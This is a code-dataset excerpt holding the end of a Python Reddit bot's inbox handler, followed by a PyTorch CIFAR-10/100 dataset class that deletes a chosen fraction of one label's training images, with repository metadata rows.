logger.info('[Inbox] Process: inbox item, deletion request (from /u/{}): t4_{}'.format(item.author.name, item.id))
if item.was_comment:
logger.info('[Inbox] Skip: ignore non-message item: t1_{}'.format(item.id))
return
if time.time() - item.created_utc > ignore_inbox_items_older_than:
logger.info('[Inbox] Skip: {0} is older than {1} seconds'.format(type(item).__name__, ignore_inbox_items_older_than))
return
delete_match = delete_regexp.match(item.subject)
recheck_match = recheck_regexp.match(item.subject)
if not (delete_match or recheck_match):
logger.info('[Inbox] Skip: no match (subject line): t4_{}'.format(item.id))
return
item.mark_read()
if delete_match:
thing_kind = delete_match.group(1)
comment_id = delete_match.group(2)
logger.info('[Inbox] Info: deletion request (from /u/{}): "t1_{}"'.format(item.author.name, comment_id))
if thing_kind is not None:
if thing_kind != 't1':
logger.info(f"[Inbox] Skip: not the kind we're looking for: {thing_kind}_{comment_id}")
return
target_id = db_services.get_target_id(comment_id)
if target_id is None:
logger.warning('[Inbox] Warning: could not resolve target_id "{}" from comment: t1_{}'.format(target_id, comment_id))
comment = reddit.comment(comment_id)
try:
comment.refresh()
except praw.exceptions.PRAWException:
logger.info('[Inbox] Skip: not found: t1_{}'.format(comment_id))
return
by_authority = item.author.name.lower() in trustees
if by_authority:
comment.delete()
if target_id is not None:
db_services.assign_is_set_0(target_id)
logger.info('[Inbox] Success: force delete: {}-{}'.format(target_id, comment_id))
return
if target_id is None:
logger.warning('[Inbox] Skip: cannot resolve author_name from null target_id: {}-{}'.format(target_id, comment_id))
return
author_name = db_services.get_author_name(target_id)
if author_name is None:
logger.warning('[Inbox] Skip: could not resolve author_name from target_id: {}-{}'.format(target_id, comment_id))
return
if comment.author != me:
logger.info('[Inbox] Skip: not owned: {}-{}'.format(target_id, comment_id))
return
by_submitter = item.author.name.lower() == author_name.lower()
if not by_submitter:
logger.info('[Inbox] Skip: delete not permitted: {}-{}'.format(target_id, comment_id))
return
if len(comment.replies):
logger.info('[Inbox] Skip: has replies: {}-{}'.format(target_id, comment_id))
return
if not db_services.is_deletable(comment_id):
logger.info('[Inbox] Skip: not deletable: {}-{}'.format(target_id, comment_id))
return
comment.delete()
db_services.assign_is_set_0(target_id)
db_services.assign_is_ignored_1(target_id)
logger.info('[Inbox] Success: deleted: {}-{}'.format(target_id, comment_id))
elif recheck_match:
logger.info('[Inbox] Process: inbox item, recheck request (from /u/{}): t4_{}'.format(item.author.name, item.id))
by_authority = item.author.name.lower() in trustees
if not by_authority:
logger.info('[Inbox] Skip: unauthorised: t4_{}'.format(item.id))
return
thing_kind = recheck_match.group(1)
thing_id = recheck_match.group(2)
if thing_kind is None:
logger.info('[Inbox] Skip: thing_kind was not specified: {thing_kind}_{thing_id}')
return
if thing_kind != 't3':
logger.info(f"[Inbox] Skip: not the kind we're looking for: {thing_kind}_{thing_id}")
return
submission = reddit.submission(thing_id)
try:
submission._fetch()
except prawcore.exceptions.NotFound:
logger.warning('Skip: submission ID not found: t3_{}'.format(thing_id))
db_services.assign_is_set_0(thing_id)
return
process_subsmission(submission)
| 30.97619
| 120
| 0.725749
|
4a07e87c0d7748807e21b23b77e5c528c9d2598f
| 7,839
|
py
|
Python
|
dataset/cifar10_rmlabel.py
|
blackcow/Fair-AT
|
62fc269fedd4b63c4b48ae390d494b3832e65fa8
|
[
"Apache-2.0"
] | null | null | null |
dataset/cifar10_rmlabel.py
|
blackcow/Fair-AT
|
62fc269fedd4b63c4b48ae390d494b3832e65fa8
|
[
"Apache-2.0"
] | null | null | null |
dataset/cifar10_rmlabel.py
|
blackcow/Fair-AT
|
62fc269fedd4b63c4b48ae390d494b3832e65fa8
|
[
"Apache-2.0"
] | null | null | null |
"""
对 training load data 改写
按比例删除某 label 下的数据
"""
from __future__ import print_function
from PIL import Image
import os
import os.path
import numpy as np
import sys
if sys.version_info[0] == 2:
import cPickle as pickle
else:
import pickle
import torch.utils.data as data
from torchvision.datasets.utils import download_url, check_integrity
# My import
import argparse
class CIFAR10RM(data.Dataset):
"""`CIFAR10 <https://www.cs.toronto.edu/~kriz/cifar.html>`_ Dataset.
Args:
root (string): Root directory of dataset where directory
``cifar-10-batches-py`` exists or will be saved to if download is set to True.
train (bool, optional): If True, creates dataset from training set, otherwise
creates from test set.
transform (callable, optional): A function/transform that takes in an PIL image
and returns a transformed version. E.g, ``transforms.RandomCrop``
target_transform (callable, optional): A function/transform that takes in the
target and transforms it.
download (bool, optional): If true, downloads the dataset from the internet and
puts it in root directory. If dataset is already downloaded, it is not
downloaded again.
"""
base_folder = 'cifar-10-batches-py'
url = "https://www.cs.toronto.edu/~kriz/cifar-10-python.tar.gz"
filename = "cifar-10-python.tar.gz"
tgz_md5 = 'c58f30108f718f92721af3b95e74349a'
train_list = [
['data_batch_1', 'c99cafc152244af753f735de768cd75f'],
['data_batch_2', 'd4bba439e000b95fd0a9bffe97cbabec'],
['data_batch_3', '54ebc095f3ab1f0389bbae665268c751'],
['data_batch_4', '634d18415352ddfa80567beed471001a'],
['data_batch_5', '482c414d41f54cd18b22e5b47cb7c3cb'],
]
test_list = [
['test_batch', '40351d587109b95175f43aff81a1287e'],
]
meta = {
'filename': 'batches.meta',
'key': 'label_names',
'md5': '5ff9c542aee3614f3951f8cda6e48888',
}
def __init__(self, root, args, train=True,
transform=None, target_transform=None,
download=False):
self.root = os.path.expanduser(root)
self.transform = transform
self.target_transform = target_transform
self.train = train # training set or test set
self.args = args
if download:
self.download()
if not self._check_integrity():
raise RuntimeError('Dataset not found or corrupted.' +
' You can use download=True to download it')
if self.train:
downloaded_list = self.train_list
else:
downloaded_list = self.test_list
self.data = []
self.targets = []
# now load the picked numpy arrays
for file_name, checksum in downloaded_list:
file_path = os.path.join(self.root, self.base_folder, file_name)
with open(file_path, 'rb') as f:
if sys.version_info[0] == 2:
entry = pickle.load(f)
else:
entry = pickle.load(f, encoding='latin1')
self.data.append(entry['data'])
if 'labels' in entry:
self.targets.extend(entry['labels'])
else:
self.targets.extend(entry['fine_labels'])
self.data = np.vstack(self.data).reshape(-1, 3, 32, 32)
self.data = self.data.transpose((0, 2, 3, 1)) # convert to HWC
# 对 label 排序(0-9),list
sorted_nums = sorted(enumerate(self.targets), key=lambda x: x[1])
idx = [i[0] for i in sorted_nums]
self.targets = [i[1] for i in sorted_nums]
# 对 data 排序,ndarry
self.data = self.data[idx]
# 确定删除元素的位置(每 5k 为 1 个 label)
label_idx = self.args.rmlabel
percent = self.args.percent
start = label_idx * 5000
end = int(start + 5000*percent)
print('start:', start)
print('end:', end)
rm = np.arange(start, end, 1)
# 删除元素,label 和 data
# self.targets1 = np.delete(self.targets, rm)
self.data = np.delete(self.data, rm, axis=0)
del self.targets[start:end]
self._load_meta()
# # 打印图片
# import matplotlib.pyplot as plt
# i = 9000
# label = self.targets[i]
# img = self.data[i]
# plt.imshow(img)
# plt.show()
# test = 0
def _load_meta(self):
path = os.path.join(self.root, self.base_folder, self.meta['filename'])
if not check_integrity(path, self.meta['md5']):
raise RuntimeError('Dataset metadata file not found or corrupted.' +
' You can use download=True to download it')
with open(path, 'rb') as infile:
if sys.version_info[0] == 2:
data = pickle.load(infile)
else:
data = pickle.load(infile, encoding='latin1')
self.classes = data[self.meta['key']]
self.class_to_idx = {_class: i for i, _class in enumerate(self.classes)}
print()
def __getitem__(self, index):
"""
Args:
index (int): Index
Returns:
tuple: (image, target) where target is index of the target class.
"""
img, target = self.data[index], self.targets[index]
# doing this so that it is consistent with all other datasets
# to return a PIL Image
img = Image.fromarray(img)
if self.transform is not None:
img = self.transform(img)
if self.target_transform is not None:
target = self.target_transform(target)
return img, target
def __len__(self):
return len(self.data)
def _check_integrity(self):
root = self.root
for fentry in (self.train_list + self.test_list):
filename, md5 = fentry[0], fentry[1]
fpath = os.path.join(root, self.base_folder, filename)
if not check_integrity(fpath, md5):
return False
return True
def download(self):
import tarfile
if self._check_integrity():
print('Files already downloaded and verified')
return
download_url(self.url, self.root, self.filename, self.tgz_md5)
# extract file
with tarfile.open(os.path.join(self.root, self.filename), "r:gz") as tar:
tar.extractall(path=self.root)
def __repr__(self):
fmt_str = 'Dataset ' + self.__class__.__name__ + '\n'
fmt_str += ' Number of datapoints: {}\n'.format(self.__len__())
tmp = 'train' if self.train is True else 'test'
fmt_str += ' Split: {}\n'.format(tmp)
fmt_str += ' Root Location: {}\n'.format(self.root)
tmp = ' Transforms (if any): '
fmt_str += '{0}{1}\n'.format(tmp, self.transform.__repr__().replace('\n', '\n' + ' ' * len(tmp)))
tmp = ' Target Transforms (if any): '
fmt_str += '{0}{1}'.format(tmp, self.target_transform.__repr__().replace('\n', '\n' + ' ' * len(tmp)))
return fmt_str
class CIFAR100RM(CIFAR10RM):
"""`CIFAR100 <https://www.cs.toronto.edu/~kriz/cifar.html>`_ Dataset.
This is a subclass of the `CIFAR10` Dataset.
"""
base_folder = 'cifar-100-python'
url = "https://www.cs.toronto.edu/~kriz/cifar-100-python.tar.gz"
filename = "cifar-100-python.tar.gz"
tgz_md5 = 'eb9058c3a382ffc7106e4002c42a8d85'
train_list = [
['train', '16019d7e3df5f24257cddd939b257f8d'],
]
test_list = [
['test', 'f0ef6b0ae62326f3e7ffdfab6717acfc'],
]
meta = {
'filename': 'meta',
'key': 'fine_label_names',
'md5': '7973b15100ade9c7d40fb424638fde48',
}
| 34.685841
| 110
| 0.589871
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.